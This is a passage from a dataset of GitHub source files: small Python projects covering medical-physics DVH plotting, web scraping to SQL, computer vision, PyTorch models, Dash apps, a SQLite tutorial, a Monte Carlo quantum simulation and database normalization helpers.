fontsize=SMALL_SIZE) # legend fontsize\n plt.rc('figure', titlesize=LARGE_SIZE) # fontsize of the figure title\n\n fig = plt.gcf()\n\n return mpld3.fig_to_html(fig)\n\n\ndef calculate_cumulative_DVH(doseVolumeData, noBins):\n\n cumulativeDVH = {}\n\n for key in doseVolumeData:\n\n if key not in cumulativeDVH:\n cumulativeDVH[key] = [0] * noBins;\n\n cumulativeTotal = 0;\n\n for n in range(noBins-1, -1, -1):\n cumulativeTotal += doseVolumeData[key][n]\n cumulativeDVH[key][n] = cumulativeTotal\n\n return cumulativeDVH\n\n\n# regionBoundaries is a 6-entry vector of floating point values\n# This defines the boundaries of the subregion in the order xmin, xmax, ymin, ymax, zmin, zmax\ndef extract_mesh_subregion(mesh,regionBoundaries):\n subregionAlgorithm = vtkExtractUnstructuredGrid()\n subregionAlgorithm.SetInputData(mesh)\n subregionAlgorithm.SetExtent(regionBoundaries)\n subregionAlgorithm.Update()\n return subregionAlgorithm.GetOutput()\n\n\ndef dose_volume_histogram(filePath):\n\n filePath = os.path.dirname(__file__) + filePath\n\n output = import_data(filePath)\n\n ## regionBoundaries = [100, 140, 55, 75, 80, 110] ## Good region for FullMonte_fluence_line mesh\n ## output = extract_mesh_subregion(output, regionBoundaries)\n\n # Arrays are of type numpy.ndarray\n numpyWrapper = npi.WrapDataObject( output )\n\n try:\n fluenceData = numpyWrapper.CellData[\"Fluence\"] # Assuming you know the name of the array\n regionData = numpyWrapper.CellData[\"Region\"]\n\n if (fluenceData.size != regionData.size):\n print(\"Fluence and region data do not match\")\n return(-1)\n\n except AttributeError:\n print(\"Could not parse region or fluence data by name. Attempting to parse by index\")\n\n try:\n regionData = numpyWrapper.CellData[0]\n fluenceData = numpyWrapper.CellData[1] # Assuming you know the number of the array\n\n if (fluenceData.size != regionData.size):\n print(\"Fluence and region data do not match\")\n return(-1)\n\n except IndexError:\n print(\"Could not parse region or fluence data. Input mesh may not be a correctly formatted FullMonte output file.\")\n return(-1)\n\n except:\n print(\"Unidentified error occurred. Could not parse input data\")\n return(-2)\n\n\n noBins = 500\n noCells = fluenceData.size\n\n volumeData = calculate_volumes(output,regionData,noCells)\n doseData = populate_dictionary(fluenceData,regionData)\n DVHdata = calculate_DVH(doseData,volumeData,noBins)\n cumulativeDVH = calculate_cumulative_DVH(DVHdata, noBins)\n return plot_DVH(cumulativeDVH,noBins)\n","repo_name":"julian-gonsalves/FullMonteWeb","sub_path":"application/dvh.py","file_name":"dvh.py","file_ext":"py","file_size_in_byte":6008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21708785676","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n#打开pipline 在 setting 文件中\n\nfrom datetime import datetime\nfrom sqlalchemy.orm import sessionmaker\nfrom shiyanlou.models import Course,User,engine\nfrom shiyanlou.items import CoursesItem,UserItem\n\nclass ShiyanlouPipeline(object):\n\n #收到 item 后处理\n def process_item(self, item, spider):\n #判断 如果是 CourseItem 的 item 做_process_course_item 处理\n if isinstance(item,CoursesItem):\n self._process_course_item(item)\n #否则._process_user_item\n else:\n self._process_user_item(item)\n return item\n \n #定义函数具体的操作\n def _process_course_item(self,item):\n item['students'] = int(item['students'])\n self.session.add(Course(**item))\n\n def _process_user_item(self,item):\n item['level'] = int(item['level'][1:])\n item['join_date'] = datetime.strptime(item['join_date'].split()[0],'%Y-%m-%d').date()\n item['learn_courses_num'] = int(item['learn_courses_num'])\n self.session.add(User(**item))\n\n #打开爬虫前 关联数据库\n def open_spider(self,spider):\n Session = sessionmaker(bind=engine)\n self.session = Session()\n\n #关闭爬虫后 提交数据,关闭关联\n def close_spider(self,spider):\n self.session.commit()\n self.session.close()\n","repo_name":"zxspython/learn_python1","sub_path":"challenge_w4_scrapy/shiyanlou_courses_and_user_spider/shiyanlou/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20436531415","text":"class Solution:\n def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:\n Y = len(matrix)\n X = len(matrix[0])\n for y in range(Y):\n for x in range(X):\n if y+1 >= Y or x+1 >= X:\n continue\n if matrix[y][x] != matrix[y+1][x+1]:\n return False\n return True\n","repo_name":"ndjman7/Algorithm","sub_path":"Leetcode/toeplitz-matrix/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"2901500032","text":"import cv2 as cv \nimport numpy as np \n\n\n\nimg = cv.imread('bhai.jpg')\nimg = cv.resize(img, (400,300), cv.INTER_AREA)\ncv.imshow('image', img)\n\nblank = np.zeros(img.shape, dtype='uint8')\ncv.imshow('blank', blank)\n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('gray', gray) \n\nret, thresh = cv.threshold(gray, 125, 255, cv.THRESH_BINARY)\ncv.imshow('thresh', thresh)\n\ncanny = cv.Canny(img, 125, 175)\ncv.imshow('canny', canny)\n\ncontours, hierarchies = cv.findContours(canny, cv.RETR_LIST, cv.CHAIN_APPROX_NONE)\nprint(f\"we found {len(contours)} contours\")\n\ncv.drawContours(blank, contours, -1, (0,0,255), 2)\ncv.imshow('contour image', blank)\n\ncv.waitKey(0)\n","repo_name":"kunal-kumar-chaudhary/OpenCV","sub_path":"contours.py","file_name":"contours.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22602105250","text":"# 在这个类中,我首先加载原始的PreResNet(应当也兼容原始ResNet),然后剔除当前的头,添加我们的1,2,3,4,5个头\n# 然后在model.py中添加这个不同头的模型;\nimport torch\nimport torch.nn as nn\nimport pdb\n\nclass Multi_FC_Model(nn.Module):\n def __init__(self,model,num_classes,block_expansion=1,num_fc=2):\n '''\n model就是我们传入的cnn+fc模型,可以剔除其fc,然后根据我们的需要添加单个或者多个fc\n '''\n super(Multi_FC_Model,self).__init__()\n self.num_fc = num_fc\n self.CNN = nn.Sequential(*list(model.children())[:-1])\n # self.fc_list = nn.ModuleList()\n # pdb.set_trace()\n # for i in range(self.num_fc):\n # self.fc_list.append(nn.Linear(512*block_expansion,num_classes))\n # self.train_FLAG = True\n self.fc_main = nn.Linear(512*block_expansion,num_classes)\n self.fc_2 = nn.Linear(512*block_expansion,num_classes)\n \n def forward(self,x):\n x = self.CNN(x)\n\n x = torch.nn.functional.avg_pool2d(x, 4)\n x = x.view(x.size(0), -1)\n\n # outputs = []\n # for fc in self.fc_list:\n # outputs.append(fc(x))\n output_main = self.fc_main(x)\n output_2 = self.fc_2(x.detach())\n\n return output_main, output_2\n\n\n\n","repo_name":"qinwei-hfut/the_BLCL","sub_path":"model/Multi_FC_Model.py","file_name":"Multi_FC_Model.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"26407344184","text":"import plotly.express as px\nimport plotly.graph_objects as go\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom skimage import data, exposure\nimport json\n\nimg = data.camera()\nfig = px.imshow(img, binary_string=True)\nfig.update_layout(dragmode=\"drawrect\")\n\nfig_hist = px.histogram(img.ravel())\n\n# Build App\napp = dash.Dash(__name__)\napp.layout = html.Div(\n [\n html.H3(\"Draw a shape, then modify it.\"),\n html.Div(\n [dcc.Graph(id=\"fig-pic\", figure=fig),],\n style={\"width\": \"60%\", \"display\": \"inline-block\", \"padding\": \"0 0\"},\n ),\n html.Div(\n [dcc.Graph(id=\"graph-hist\", figure=fig_hist),],\n style={\"width\": \"40%\", \"display\": \"inline-block\", \"padding\": \"0 0\"},\n ),\n html.Pre(id=\"annotations\"),\n ]\n)\n\n\n@app.callback(\n Output(\"graph-hist\", \"figure\"),\n Output(\"annotations\", \"children\"),\n Input(\"fig-pic\", \"relayoutData\"),\n prevent_initial_call=True,\n)\ndef on_relayout(relayout_data):\n x0, y0, x1, y1 = (None,) * 4\n if \"shapes\" in relayout_data:\n last_shape = relayout_data[\"shapes\"][-1]\n x0, y0 = int(last_shape[\"x0\"]), int(last_shape[\"y0\"])\n x1, y1 = int(last_shape[\"x1\"]), int(last_shape[\"y1\"])\n if x0 > x1:\n x0, x1 = x1, x0\n if y0 > y1:\n y0, y1 = y1, y0\n elif any([\"shapes\" in key for key in relayout_data]):\n x0 = int([relayout_data[key] for key in relayout_data if \"x0\" in key][0])\n x1 = int([relayout_data[key] for key in relayout_data if \"x1\" in key][0])\n y0 = int([relayout_data[key] for key in relayout_data if \"y0\" in key][0])\n y1 = int([relayout_data[key] for key in relayout_data if \"y1\" in key][0])\n if all((x0, y0, x1, y1)):\n roi_img = img[y0:y1, x0:x1]\n return (px.histogram(roi_img.ravel()), json.dumps(relayout_data, indent=2))\n else:\n return (dash.no_update,) * 2\n\n\nif __name__ == \"__main__\":\n app.run_server(mode=\"inline\", port=8057)\n","repo_name":"plotly/dash-docs","sub_path":"dash_docs/chapters/dash_annotations/examples/modify_shapes_part2.py","file_name":"modify_shapes_part2.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":370,"dataset":"github-code","pt":"60"} +{"seq_id":"73504168191","text":"from typing import List\nfrom core.attribute import Attribute\nfrom core.relation import Relation\nfrom core.dependency import Dependency\n\ndef get_list_of_key_names(relation: Relation) -> List[str]:\n return [att.name for att in relation.primary_keys]\n \ndef get_list_of_attribute_names(relation: Relation) -> List[str]:\n return [att.name for att in relation.attributes]\n\ndef areRelationsEquivalent(A: Relation, B: Relation) -> bool:\n if A.name != B.name:\n return False\n if len(A.attributes) != len(B.attributes):\n return False \n A_attribute_names = [att.name for att in A.attributes]\n B_attribute_names = [att.name for att in B.attributes]\n if sorted(A_attribute_names) != sorted(B_attribute_names):\n return False\n if len(A.primary_keys) != len(B.primary_keys):\n return False\n A_key_names = [att.name for att in A.primary_keys]\n B_key_names = [att.name for att in B.primary_keys]\n if sorted(A_key_names) != sorted(B_key_names):\n return False\n if len(A.dependencies) != len(B.dependencies):\n return False\n for A_dependency in A.dependencies:\n dependency_matched = False\n matching_B_dependency = [dep for dep in B.dependencies if dep.parent == A_dependency.parent]\n for B_dependency in matching_B_dependency:\n if sorted(A_dependency.children) == sorted(B_dependency.children):\n dependency_matched = True\n break\n if dependency_matched:\n break\n if not dependency_matched:\n return False\n if len(A.tuples) != len(B.tuples):\n return False\n for A_tuple in A.tuples:\n matching_B_tuple = [B_t for B_t in B.tuples if sorted(B_t) == sorted(A_tuple)]\n if not matching_B_tuple:\n return False\n return True\n\ndef split_tuples_v2(R: Relation, A_Attributes: List[Attribute], B_Attributes: List[Attribute]) -> (List[List[str]], List[List[str]]):\n # Get just the attribute names\n a_attribute_names = [att.name for att in A_Attributes]\n b_attribute_names = [att.name for att in B_Attributes]\n # Get staying_indexes and going_indexes\n a_indexes = []\n b_indexes = []\n for index, attribute in enumerate(R.attributes):\n if attribute.name in a_attribute_names:\n a_indexes.append(index)\n if attribute.name in b_attribute_names:\n b_indexes.append(index)\n # make two subsets of the original tuples mapped to the indexes we just pulled\n a_tuples = []\n b_tuples = []\n for row in R.tuples:\n new_a_tuple = [row[i] for i in a_indexes]\n new_b_tuple = [row[i] for i in b_indexes]\n a_tuples.append(new_a_tuple)\n b_tuples.append(new_b_tuple)\n return (a_tuples, b_tuples)\n\ndef get_relation_name(keys: List[Attribute]) -> str:\n keyNames = [key.name for key in keys]\n return ''.join(keyNames)\n\ndef get_relevant_dependencies(R: Relation, attributes: List[Attribute]) -> List[Dependency]:\n dependencies = []\n for dep in R.dependencies:\n if parent_attribute_present(dep, attributes) and subset_of_children_attribute_present(dep, attributes):\n modified_dep = get_required_dependency_data(dep, attributes)\n dependencies.append(modified_dep)\n return dependencies\n\ndef get_required_dependency_data(dep: Dependency, attributes: List[Attribute]) -> Dependency:\n if all_dependency_attributes_present(dep, attributes):\n return dep\n attribute_names = [att.name for att in attributes]\n dependency_subset = Dependency(parent=dep.parent, children=[child for child in dep.children if child in attribute_names])\n return dependency_subset\n\ndef parent_attribute_present(dep: Dependency, attributes: List[Attribute]) -> bool:\n # Get just the attribute names\n attribute_names = [att.name for att in attributes]\n if dep.parent not in attribute_names:\n return False\n return True\n\ndef subset_of_children_attribute_present(dep: Dependency, attributes: List[Attribute]) -> bool:\n # Get just the attribute names\n attribute_names = [att.name for att in attributes]\n for child in dep.children:\n if child in attribute_names:\n return True\n return False\n\ndef all_dependency_attributes_present(dep: Dependency, attributes: List[Attribute]) -> bool:\n # Get just the attribute names\n attribute_names = [att.name for att in attributes]\n if dep.parent not in attribute_names:\n return False\n for child in dep.children:\n if child not in attribute_names:\n return False\n return True\n\ndef split_attributes_by_parent_and_descendants(attributes: List[Attribute], parent: str, descendants: List[str]) -> (List[Attribute], List[Attribute]):\n a_attributes = []\n b_attributes = []\n\n for att in attributes:\n # If it is part of the dependency, it is broken out\n if att.name in descendants or att.name == parent:\n a_attributes.append(att)\n # If it is not part of the dependency, it is kept EXCEPT for the parent which is kept as a foreign key\n if att.name not in descendants:\n b_attributes.append(att)\n \n # Logic check...\n if len(a_attributes) < 2:\n raise Exception(f\"Cannot have a resulting relation with fewer than two attributes.\")\n if len(b_attributes) < 2:\n raise Exception(f\"Cannot have a resulting relation with fewer than two attributes.\")\n \n return (a_attributes, b_attributes)\n\ndef split_relation(R: Relation, A_Attributes: List[Attribute], B_Attributes: List[Attribute]) -> (Relation, Relation):\n # Split the data\n (a_tuples, b_tuples) = split_tuples_v2(R, A_Attributes, B_Attributes)\n # Build relation name\n a_name = get_relation_name(A_Attributes)\n b_name = get_relation_name(B_Attributes)\n # Get dependencies\n a_dependencies = get_relevant_dependencies(R, A_Attributes)\n b_dependencies = get_relevant_dependencies(R, B_Attributes)\n # Split the keys\n a_keys = [key for key in R.primary_keys if key.name in [att.name for att in A_Attributes]]\n if not a_keys:\n a_keys = [att for att in A_Attributes if att.name in [dep.parent for dep in a_dependencies]]\n if not a_keys:\n a_keys = [A_Attributes[0]]\n b_keys = [key for key in R.primary_keys if key.name in [att.name for att in B_Attributes]]\n if not b_keys:\n b_keys = [att for att in B_Attributes if att.name in [dep.parent for dep in b_dependencies]]\n if not b_keys:\n b_keys = [B_Attributes[0]]\n\n A = Relation(\n name=f\"{a_name}s\",\n attributes=A_Attributes,\n tuples=a_tuples,\n primary_keys=a_keys,\n dependencies=a_dependencies\n )\n B = Relation(\n name=f\"{b_name}s\",\n attributes=B_Attributes,\n tuples=b_tuples,\n primary_keys=b_keys,\n dependencies=b_dependencies\n )\n \n return (A, B)","repo_name":"conrad-john/database-normalizer","sub_path":"application/relation_helper_functions.py","file_name":"relation_helper_functions.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29641738318","text":"#! /usr/bin/python3\n\nimport sqlite3\n\n# returns a connection object - this line creates the database if it does not already exist\nconnection = sqlite3.connect(\"aquarium.db\")\n\n\n# verify successully created db with this line\n# connection.total_changes is the number of rows that have been changed by the connection object\n# print(connection.total_changes)\n\ncursor = connection.cursor()\n\n\n# The cursor.execute object-method is used to interact with the database\n\n# Creates table in the database\n# cursor.execute(\"CREATE TABLE fish (name TEXT, species TEXT, tank_number INTEGER)\")\n\n\n# data is inserted into the tables in this format.\ncursor.execute(\"INSERT INTO fish VALUES ('jamie', 'cuttlefish', 7)\")\ncursor.execute(\"INSERT INTO fish VALUES ('sammy', 'shark', 1)\")\n\n\n\n# cursor.execute([SQL statments}).fetchall() allows you to fetch all results of a SELECT statement\n\n\n\n# reading data from the database\nrows = cursor.execute(\"SELECT * FROM fish\").fetchall()\n# saving the output into a file 'rows' and then printing it.\nprint(rows)\n\n\n\n# Using a WHERE clause in an sql query - example\n# use '?' to bind arguments to your SQL statements instead of using python string operations\n# Doing it this way protects you against SQL injection attacks\ntarget_fish_name = \"jamie\"\nrows = cursor.execute(\n \"SELECT name, species, tank_number FROM fish WHERE name = ?\", (target_fish_name,),\n ).fetchall()\nprint(rows)\n\n\n\n\n\nwhile True:\n fish_name = input(\"Add fish name to the database: \")\n fish_species = input(\"Fish species: \")\n fish_tank = input(\"Which tank is the fish in? (integer): \")\n cursor.execute(\"INSERT INTO fish VALUES (?, ?, ?)\", (fish_name, fish_species, fish_tank))\n rows = cursor.execute(\"SELECT * FROM fish\").fetchall()\n for row in rows:\n print(row, end='\\n')\n break\n \n\n\n\n# The following statements are necessary for saving results in the database.\n# .commit method is absolutely necessary if you want the data modified to remain in persistent storage\nconnection.commit()\n\n\nconnection.close()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"snidarian/language_fundamentals","sub_path":"python3/modules/sqlite3_module/using_sqlite3.py","file_name":"using_sqlite3.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"38126482447","text":"\"\"\"\r\nPHY407 Final Project\r\n\r\nAuthor: Lisa Nasu-Yu\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import exp\r\nfrom random import random, seed, randint\r\nfrom time import time\r\n\r\n# plot format settings\r\nS = 15\r\nL = 15\r\nT = 15\r\n\r\nplt.rc('font', size = S)\r\nplt.rc('axes', titlesize = T)\r\nplt.rc('axes', labelsize = S)\r\nplt.rc('xtick', labelsize = S)\r\nplt.rc('ytick', labelsize = S)\r\nplt.rc('legend', fontsize = L)\r\nplt.rc('figure', titlesize = S)\r\n\r\n\r\ndef deriv2(f, i):\r\n \"\"\"\r\n Calculates second derivative\r\n :param f: [array] series of floats depicting a function\r\n :param i: [int] index in domain at which to calculate the derivative\r\n :return: [float]\r\n \"\"\"\r\n d2 = (f[i+1] - f[i]) / dx\r\n d1 = (f[i] - f[i-1]) / dx\r\n return (d2 - d1) / dx\r\n\r\n\r\ndef V(i, k):\r\n \"\"\"\r\n Calculates potential\r\n :param i: [float] position\r\n :param k: [float] constant in potential\r\n :return: [float] potential at x\r\n \"\"\"\r\n return 0.5*k*i**2\r\n\r\n\r\ndef hamiltonian(f, i, v, k):\r\n \"\"\"\r\n Calculates hamiltonian of some wavefunction\r\n :param f: [array] series of floats depicting the wavefunction\r\n :param i: [int] index in domain at which to calculate\r\n :param v: numpy function for potential\r\n :param k: [float] constant in potential\r\n :return: [float]\r\n \"\"\"\r\n return -1 * (hbar**2/(2*m)) * deriv2(f, i) + v(x[i], k) * f[i]\r\n\r\n\r\ndef normalize(f):\r\n \"\"\"\r\n Normalizes wavefunction\r\n :param f: [array] series of floats depicting wavefunction\r\n :return: [array] normalized wavefunction\r\n \"\"\"\r\n return np.sqrt(np.sum([dx*i**2 for i in f]))\r\n\r\n\r\ndef energy(f, v, k):\r\n \"\"\"\r\n Calculates \"energy\" of trial wavefunction\r\n :param f: [array] series of floats depicting trial wavefunction\r\n :param v: numpy function for potential\r\n :param k: [float] constant in potential\r\n :return: [float]\r\n \"\"\"\r\n return np.sum([dx*f[i]*hamiltonian(f, i, v, k) for i in range(1, len(x)-2)])\r\n\r\n\r\ndef sim_annealing(psi, v, k):\r\n \"\"\"\r\n Main function for variational Monte Carlo simulation\r\n :param psi: [array] series of floats depicting initial trial wavefunction\r\n :param v: numpy function for potential\r\n :param k: [float] constant in potential\r\n :return:\r\n \"\"\"\r\n # Main loop\r\n t = 0 # tracks step number\r\n # initiate arrays\r\n psis = []\r\n times = []\r\n energys = []\r\n\r\n # input initial values in arrays\r\n psis.append(psi)\r\n times.append(t)\r\n energyn = np.sum([energy(psi[i],v, k[i]) for i in range(len(k))])\r\n energys.append(energyn)\r\n psi = psi\r\n\r\n # set seed\r\n seed(2)\r\n start_time = time()\r\n # run loop until within 1 percent of actual value\r\n while np.abs(energyn-4.743)/4.743 > 0.01:\r\n t += 1\r\n oldpsi = np.copy(psi)\r\n\r\n # generate weighted random integer\r\n psi_max = np.max(psi[0])\r\n psi_n = 0\r\n r3 = 1\r\n while r3 > psi_n / psi_max:\r\n r1 = random()\r\n r1 = int(r1*len(x) - (len(x)-1)/2)\r\n r2 = random()\r\n r2 = int(r2 * len(x) - (len(x)-1)/2)\r\n if r2 != 0:\r\n psi_n = psi[0][r1]*np.cos(np.arctan(r1/r2)) + psi[1][r2]*np.sin(np.arctan(r1/r2))\r\n else:\r\n psi_n = psi[0][r1]\r\n r3 = random()\r\n\r\n # generate random amount to change psi[ntest] by\r\n frac = np.random.normal(0, 1)\r\n dpsi = 0.5 * (np.abs(oldpsi[0][r1]))\r\n psi[0][r1] += frac * dpsi\r\n psi[0] /= normalize(psi[0]) # normalize\r\n\r\n frac = np.random.normal(0, 1)\r\n dpsi = 0.5 * (np.abs(oldpsi[1][r2]))\r\n psi[1][r2] += frac * dpsi\r\n psi[1] /= normalize(psi[1]) # normalize\r\n\r\n # # generate random integer (not weighted)\r\n # for i in range(len(psi)):\r\n # ntest = randint(1, len(x)-2) #xleft, xright\r\n # frac = np.random.normal(0,1)\r\n # dpsi = 0.5*(np.abs(oldpsi[-1][ntest]))\r\n # psi[i][ntest] += frac*dpsi\r\n # psi[i] /= normalize(psi[i]) # normalize\r\n\r\n # compute energy\r\n old_energy = np.copy(energyn)\r\n energyn = np.sum([energy(psi[i], v, k[i]) for i in range(len(k))])\r\n delta = old_energy - energyn\r\n\r\n # If the move is rejected, swap them back again\r\n if delta < 0:\r\n psi = oldpsi\r\n energyn = old_energy\r\n\r\n # store some values in array\r\n if t in [1e2, 1e3, 1e4, 1e5]:\r\n psis.append(psi)\r\n times.append(t)\r\n energys.append(np.sum([energy(psi[i], v, k[i]) for i in range(len(k))]))\r\n\r\n # prevent overlooping\r\n if t > 1e6:\r\n break\r\n timer = time() - start_time\r\n\r\n # input last sets into array\r\n psis.append(psi)\r\n times.append(t)\r\n energys.append(np.sum([energy(psi[i], v, k[i]) for i in range(len(k))]))\r\n return psis, energys, times, timer\r\n\r\nhbar = 1\r\nm = 1\r\nw = 1\r\ndx = 0.2\r\nx = np.arange(-5,5, dx)\r\ntrialx = np.zeros(len(x))\r\ntrialy = np.zeros(len(x))\r\nbounds = 2\r\nxleft = np.where(np.abs(x+bounds) < 1e-12)[0][0]\r\nxright = np.where(np.abs(x-bounds) < 1e-12)[0][0]\r\n\r\n# set intial trial functions\r\n# trialx[xleft:xright] = 1.0 # constant function\r\ntrialx = np.exp(-x**2)\r\ntrialx = trialx/ normalize(trialx) # normalized trial function\r\n\r\n# trialy[xleft:xright] = 1.0\r\ntrialy = np.exp(-x**2)\r\ntrialy = trialy / normalize(trialy)\r\n\r\npsis, energies, ts, timer = sim_annealing([trialx, trialy], V, [10,40])\r\n\r\n# plot trial wave function progress\r\nfor d in range(np.shape(psis)[1]):\r\n plt.figure()\r\n plt.title(r'$\\psi_{trial}$ for 2-D Harmonic Oscillator')\r\n plt.ylabel(r'$\\psi_{trial}$')\r\n plt.xlabel('x [m]')\r\n for i in range(len(ts)):\r\n plt.plot(x, psis[i][d], label=(ts[i]))\r\n plt.legend(title='Step')\r\n # plt.savefig('{}2d montecarlo_exp2.pdf'.format(d))\r\n\r\n# plot energies\r\nplt.figure()\r\nplt.title('Energy')\r\nplt.xlabel('Step')\r\nplt.ylabel(r'Energy [J$\\cdot \\hbar]$')\r\nplt.plot(ts, energies)\r\n# plt.savefig('2energies_exp2.pdf')\r\n\r\n# plot final ground state\r\ncomponent = ['x', 'y']\r\nplt.figure()\r\nplt.title(\"Approximation of Ground State\")\r\nplt.ylabel(r'$\\psi_{0}$')\r\nplt.xlabel('x [m]')\r\nfor n, psix in enumerate(psis[-1]):\r\n plt.plot(x, psix, marker='o', label=component[n])\r\nplt.legend()\r\n# plt.savefig('2dfinal_exp2.pdf')\r\nplt.show()\r\n\r\n# 3d plot\r\nfig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\r\n\r\n# Make data.\r\nX = x\r\nY = x\r\nX, Y = np.meshgrid(X, Y)\r\nZ = np.zeros((len(x), len(x)))\r\nfor i in range(len(x)):\r\n for j in range(len(x)):\r\n theta = np.arctan(np.abs(x[j]/x[i]))\r\n # Z[i,j] = psis[-1][0][i]*np.cos(theta)\r\n Z[i,j] = psis[-1][0][i]*np.cos(theta) + psis[-1][1][j]*np.sin(theta)\r\n\r\n# Plot the surface.\r\nplt.title('Ground State of 2-D Harmonic Oscillator')\r\nsurf = ax.plot_surface(X, Y, Z, cmap=plt.cm.coolwarm,\r\n linewidth=0, antialiased=False)\r\n\r\n# Customize the z axis.\r\nax.zaxis.set_major_locator(plt.LinearLocator(10))\r\n# A StrMethodFormatter is used automatically\r\nax.zaxis.set_major_formatter('{x:.02f}')\r\n\r\n# set ticks\r\nax.set_xticks([-5, -2, 0, 2, 5])\r\nax.set_yticks([-5, -2, 0, 2, 5])\r\nax.set_zticks([0, 0.5, 1, 1.5])\r\n\r\nax.set_xlabel('x')\r\nax.set_ylabel('y')\r\nax.set_zlabel(r'$\\psi$')\r\n\r\n# Add a color bar which maps values to colors.\r\nfig.colorbar(surf, shrink=0.5, aspect=5)\r\n# plt.savefig('3d_exp2.pdf')\r\n\r\nplt.show()\r\n\r\n","repo_name":"lisan-y/PHY407","sub_path":"Variational Monte Carlo Method for Time-Independent Schrodinger Equation/Final_Project.py","file_name":"Final_Project.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74575621949","text":"import basevcstest\nimport vcs\n\n\nclass TestVCSPatterns(basevcstest.VCSBaseTest):\n def testPatterns(self):\n s = self.clt(\"clt\", time=slice(0, 1), squeeze=1)\n iso = self.x.createisofill(\"isoleg\")\n iso.levels = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n iso.fillareastyle = \"pattern\"\n iso.fillareacolors = vcs.getcolors(\n [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100])\n iso.fillareaindices = [1, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20]\n self.x.plot(s, iso, bg=self.bg)\n fnm = \"test_vcs_patterns.png\"\n self.checkImage(fnm)\n","repo_name":"CDAT/vcs","sub_path":"tests/test_vcs_patterns.py","file_name":"test_vcs_patterns.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"60"} +{"seq_id":"34785402982","text":"class Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n @cache\n def lcs(i: int, j: int) -> int:\n if i >= len(s) or j < 0:\n return 0\n if s[i] == s[j]:\n return 1 + lcs(i + 1, j - 1)\n return max(lcs(i + 1, j), lcs(i, j - 1))\n\n return lcs(0, len(s) - 1)","repo_name":"Munirmohammed/code","sub_path":"longest-palindromic-subsequence/longest-palindromic-subsequence.py","file_name":"longest-palindromic-subsequence.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"31435067167","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport datetime\nimport traceback\nimport pytz\nimport job_state as _job_state\nimport record as _record\nrecord = _record.record\njob_state = _job_state.job_state\ntimestr2unix = _record.timestr2unix\n\n\ndef smart_time_parser(s, reftime):\n l, r = len(s) if s else 0, reftime\n if l == 8:\n return timestr2unix(s, '%Y%m%d')\n elif l == 6:\n return timestr2unix('20'+s, '%Y%m%d')\n elif l == 4:\n return timestr2unix('%04d%s' % (r.year, s), '%Y%m%d')\n elif l == 2:\n return timestr2unix('%04d%02d%s' % (r.year, r.month, s), '%Y%m%d')\n elif l == 0:\n return timestr2unix('%04d%02d%02d' % (r.year, r.month, r.day), '%Y%m%d')\n else:\n raise ValueError(\"Not any format of yyyymmdd, yymmdd, mmdd, dd.\")\n\n\ndef process(job_states, fn, def_time, user_filter, group_filter, queue_filter):\n for l in open(fn):\n r = record(l)\n if r.rectype is None:\n continue\n if (user_filter and r.user not in user_filter or\n group_filter and r.group not in group_filter or\n queue_filter and r.queue not in queue_filter):\n continue\n if r.jobid not in job_states:\n job_states[r.jobid] = job_state(def_time)\n try:\n job_states[r.jobid].push(r)\n except _job_state.StateError:\n traceback.print_exc()\n print(f\"jobid is {r.jobid}\")\n # exit(1)\n\n\ndef main(start_time, end_time_str, filelist, opts):\n user_filter, group_filter, queue_filter, queue_ignore = map(\n frozenset, [opts.only_user, opts.only_group, opts.only_queue, opts.ignore_queue])\n job_states = {}\n for i in filelist:\n if os.path.isfile(i):\n #print(f\"Processing: {i}\")\n process(job_states, i, start_time, user_filter, group_filter, queue_filter)\n else:\n #print(f\"File not found: {i}\")\n True\n fake_E_rec = end_time_str+';E;-1.dummy;'\n\n user_stat, group_stat = {}, {}\n total_cputime = 0\n for jobid, js in job_states.items():\n if js.state not in 'DER':\n js.push(record(fake_E_rec))\n if opts.verbose or len(js.queues) > 1 and opts.debug_multiqueue:\n print('{:10} {}'.format(jobid, js))\n js.queues = frozenset(js.queues-queue_ignore)\n if opts.user:\n try:\n user_stat[(js.user, js.group, js.queues)] += js.cputime\n except KeyError:\n user_stat[(js.user, js.group, js.queues)] = js.cputime\n except TypeError:\n print(js.queues)\n if opts.group:\n try:\n group_stat[js.group] += js.cputime\n except KeyError:\n group_stat[js.group] = js.cputime\n\n total_cputime += js.cputime\n\n print(f\"Total CPU Time is: 